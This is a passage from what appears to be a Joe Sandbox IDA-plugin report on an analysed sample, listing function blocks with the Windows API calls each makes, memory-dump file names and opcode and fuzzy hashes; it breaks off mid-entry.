                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                          • Instruction ID: 8f25456cb4f95a7e602415a32a972dabac365bfbc413d7dc428e341e0b819b97
                                                          • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                          • Instruction Fuzzy Hash: C651D731A00B05DBDF27AF79D84066E77A6AF41321F2587A9F836972D0D770DE948B40
                                                          APIs
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • Part of subcall function 003E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E00FD
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E013C
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003E0183
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 003E01AF
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003E01BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3440857362-0
                                                          • Opcode ID: b2ec9005fdafc5e3fe516cdc5df72aca0d9c214c1cda5070505050fb15c474fc
                                                          • Instruction ID: b56d4c06c590a449241c291f873ab227db1fb457493e661e29cad25d081c3461
                                                          • Opcode Fuzzy Hash: b2ec9005fdafc5e3fe516cdc5df72aca0d9c214c1cda5070505050fb15c474fc
                                                          • Instruction Fuzzy Hash: 51515D71208244AFD716EF54C881F6AB7E9FF84314F408A2DF5958B2A2DB71ED44CB52
                                                          APIs
                                                            • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                            • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003DD927
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 003DD9AA
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 003DD9C6
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 003DDA07
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003DDA21
                                                            • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003C7896,?,?,00000000), ref: 00365A2C
                                                            • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003C7896,?,?,00000000,?,?), ref: 00365A50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 327935632-0
                                                          • Opcode ID: 7e286c04e03e7b8fee20c5d81d3292f173c95ca74f4d6ec9e1e78a4ccb9c05b9
                                                          • Instruction ID: dbaec1b07539e4d3ec4c016e540d148a2c7ecdd856b0ae26b8d21db4ecf69390
                                                          • Opcode Fuzzy Hash: 7e286c04e03e7b8fee20c5d81d3292f173c95ca74f4d6ec9e1e78a4ccb9c05b9
                                                          • Instruction Fuzzy Hash: 0C511636A00209DFCB12EFA8D4949ADB7F8EF19320B05C16AE855AB352D731AD45CF90
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003CE61F
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003CE648
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003CE687
                                                            • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                            • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003CE6AC
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003CE6B4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1389676194-0
                                                          • Opcode ID: 5d727495d7143fa9088d75710bb21ab8ff2ccc04ae9bf37f76524311a36a2ab5
                                                          • Instruction ID: 1259f4c50b623f0d473334d96adb807cb4af9d824877be4dfa3634d63cafeb44
                                                          • Opcode Fuzzy Hash: 5d727495d7143fa9088d75710bb21ab8ff2ccc04ae9bf37f76524311a36a2ab5
                                                          • Instruction Fuzzy Hash: 4151FB35A00205DFCB16EF64C981AAEBBF9EF09314F1484A9E909AF365CB31ED15DB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a19c4389e071883da456547849b8c72f5ac072599b5de5d72b00046c792ebb31
                                                          • Instruction ID: b68b191bb3f0d31290d6aabb6cacdf6ac0946b6811f311c64e1ab2ed785b1dc7
                                                          • Opcode Fuzzy Hash: a19c4389e071883da456547849b8c72f5ac072599b5de5d72b00046c792ebb31
                                                          • Instruction Fuzzy Hash: A141F9359049A4AFD722DF35CC88FE9BBA8EB09310F164365F816A72E0C770BD41DA51
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00362357
                                                          • ScreenToClient.USER32(004257B0,?), ref: 00362374
                                                          • GetAsyncKeyState.USER32(00000001), ref: 00362399
                                                          • GetAsyncKeyState.USER32(00000002), ref: 003623A7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 228b5621eaf85de4347ca92a2c2609ec985d0ba81412b12df33121f4b726866b
                                                          • Instruction ID: 09c722ec55f47f616409745a836232665f062037b4718b9751b9e6d963911129
                                                          • Opcode Fuzzy Hash: 228b5621eaf85de4347ca92a2c2609ec985d0ba81412b12df33121f4b726866b
                                                          • Instruction Fuzzy Hash: 19418039604619FFCF278F68C844AEEBB78BB05360F21835AF829962D0C7349950DB91
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003B63E7
                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 003B6433
                                                          • TranslateMessage.USER32(?), ref: 003B645C
                                                          • DispatchMessageW.USER32(?), ref: 003B6466
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003B6475
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                          • String ID:
                                                          • API String ID: 2108273632-0
                                                          • Opcode ID: 117d209abdab0fd68b2699b6a911bdfda7b8a4b7164d460b5db77c6ad3aa9045
                                                          • Instruction ID: 4a80da508d733d2516dc40980a4d414bb7be264d4c619dec004de08ebbd280fa
                                                          • Opcode Fuzzy Hash: 117d209abdab0fd68b2699b6a911bdfda7b8a4b7164d460b5db77c6ad3aa9045
                                                          • Instruction Fuzzy Hash: BE310631600A42DFDB328F71CC46BF67BACAB01308F550175E625C78A2E7789845CB60
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 003B8A30
                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 003B8ADA
                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003B8AE2
                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 003B8AF0
                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003B8AF8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: a7fed25b820ec47777a1b7bf8320122c03c787f43d239f6f509581d5872f8c40
                                                          • Instruction ID: 79d3397cd51049d19cce5fc0168d15d4a3a7e4bb9ec2705c2e31106621492d72
                                                          • Opcode Fuzzy Hash: a7fed25b820ec47777a1b7bf8320122c03c787f43d239f6f509581d5872f8c40
                                                          • Instruction Fuzzy Hash: 3A31D171500259EFDF15CF68D98CADE7BB9EB04319F108229FA24EA6D0C7B09910CB90
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 003BB204
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003BB221
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003BB259
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003BB27F
                                                          • _wcsstr.LIBCMT ref: 003BB289
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                          • String ID:
                                                          • API String ID: 3902887630-0
                                                          • Opcode ID: 48bc25584336cb845da0e28bfe50f89e00e1e0a27fef2d942159b50223ae4cff
                                                          • Instruction ID: e12cdc944abdb379aad504944a4471e9d9a7d147eb34a897ac49c48ef3f89dba
                                                          • Opcode Fuzzy Hash: 48bc25584336cb845da0e28bfe50f89e00e1e0a27fef2d942159b50223ae4cff
                                                          • Instruction Fuzzy Hash: A821D331204240ABEB276B799C49ABFBB9CDF49710F014179F904DE5A1EFA1DC409360
                                                          APIs
                                                            • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003EB192
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003EB1B7
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003EB1CF
                                                          • GetSystemMetrics.USER32(00000004), ref: 003EB1F8
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,003D0E90,00000000), ref: 003EB216
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          • Opcode ID: d16e6a01f3fcd3c6430345962bc00b33b40bea01008572fdea16d59e74b39c81
                                                          • Instruction ID: 0de6004efe1229762fcf3ccf6bc777da8a4ad59d530286f7944aaa03909c6221
                                                          • Opcode Fuzzy Hash: d16e6a01f3fcd3c6430345962bc00b33b40bea01008572fdea16d59e74b39c81
                                                          • Instruction Fuzzy Hash: A42171716106A5AFCB229F399C44A6B77A8EB06371F114B34A922D71E0D77098219B90
                                                          APIs
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003B9320
                                                            • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003B9352
                                                          • __itow.LIBCMT ref: 003B936A
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003B9392
                                                          • __itow.LIBCMT ref: 003B93A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow$_memmove
                                                          • String ID:
                                                          • API String ID: 2983881199-0
                                                          • Opcode ID: 508a329101f04af043cd65c4b3a39fb1b93c1abd2a9ef7c54d5b2495cdf826aa
                                                          • Instruction ID: 0bfe4002464c99d5af2dc685e2fd76dd910cb9766f8d0ae3ffa854e7c7dd51a1
                                                          • Opcode Fuzzy Hash: 508a329101f04af043cd65c4b3a39fb1b93c1abd2a9ef7c54d5b2495cdf826aa
                                                          • Instruction Fuzzy Hash: 4521B335700208BBDB12AA658CC5FEE7BADEF49718F044026FB499B2D1D6B089458791
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 003D5A6E
                                                          • GetForegroundWindow.USER32 ref: 003D5A85
                                                          • GetDC.USER32(00000000), ref: 003D5AC1
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 003D5ACD
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 003D5B08
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: f5d8ff0d39d4ce73ed9f21486c0a100a1ab8d2de6e1ed826c6675051d5173e28
                                                          • Instruction ID: ce9cae060b9622a7de74bca99de91c47a6a254f83f01340b29167f3d30d3d33c
                                                          • Opcode Fuzzy Hash: f5d8ff0d39d4ce73ed9f21486c0a100a1ab8d2de6e1ed826c6675051d5173e28
                                                          • Instruction Fuzzy Hash: 1A216F76A00114AFDB15EF65D884A9ABBE9EF48350F14C57AF809DB362DA70AD00CB90
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0036134D
                                                          • SelectObject.GDI32(?,00000000), ref: 0036135C
                                                          • BeginPath.GDI32(?), ref: 00361373
                                                          • SelectObject.GDI32(?,00000000), ref: 0036139C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: c3d26ad101a40c7a8ea82601e61f771f9aaf99c793ebc03f3690447b30005cd5
                                                          • Instruction ID: f721bf70ff9c17989c1679ea05acfdfedc3e377f3a84c045a573eafead12d079
                                                          • Opcode Fuzzy Hash: c3d26ad101a40c7a8ea82601e61f771f9aaf99c793ebc03f3690447b30005cd5
                                                          • Instruction Fuzzy Hash: E721B634900608DFDB22AF25DD447697BE8FB00321F688225F4119A6B4D3F099A2DF54
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 003C4ABA
                                                          • __beginthreadex.LIBCMT ref: 003C4AD8
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 003C4AED
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003C4B03
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003C4B0A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                          • String ID:
                                                          • API String ID: 3824534824-0
                                                          • Opcode ID: f3b936e7a28e1aac29512795dab40494194f392cdc78f300060437d29d86debe
                                                          • Instruction ID: d32aebb53d1d132502b42f87f484b4bea7deba3bb5249125dd87635b496dd778
                                                          • Opcode Fuzzy Hash: f3b936e7a28e1aac29512795dab40494194f392cdc78f300060437d29d86debe
                                                          • Instruction Fuzzy Hash: 0E11E576A04248BFC7229BA89C44F9A7BACEB45320F1442A9F814D7290D6B18D008BA0
                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003B821E
                                                          • GetLastError.KERNEL32(?,003B7CE2,?,?,?), ref: 003B8228
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,003B7CE2,?,?,?), ref: 003B8237
                                                          • HeapAlloc.KERNEL32(00000000,?,003B7CE2,?,?,?), ref: 003B823E
                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003B8255
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: 187100892d96c7fd731cfad6d0df89a7ee88fad2f25148ab67be5127d535c177
                                                          • Instruction ID: de87e76b83465c29f7d948a5b4b6d677381eda645e3065af68e4978951ef06f6
                                                          • Opcode Fuzzy Hash: 187100892d96c7fd731cfad6d0df89a7ee88fad2f25148ab67be5127d535c177
                                                          • Instruction Fuzzy Hash: B4018671201645FFDB224FA5DC88DA77F6CEF86754B504929F909CB1A0DB718C00CA60
                                                          APIs
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?,?,003B7455), ref: 003B7127
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7142
                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7150
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?), ref: 003B7160
                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B716C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          • Opcode ID: 2c9d260473cefd4c6a7990e541e08d0c09a963d38525c67516ab2b092a1f98fa
                                                          • Instruction ID: d89b245a5a0ff8ead020d4300d7bf7bdcb9955f123b87211f8ef3db83968e9a8
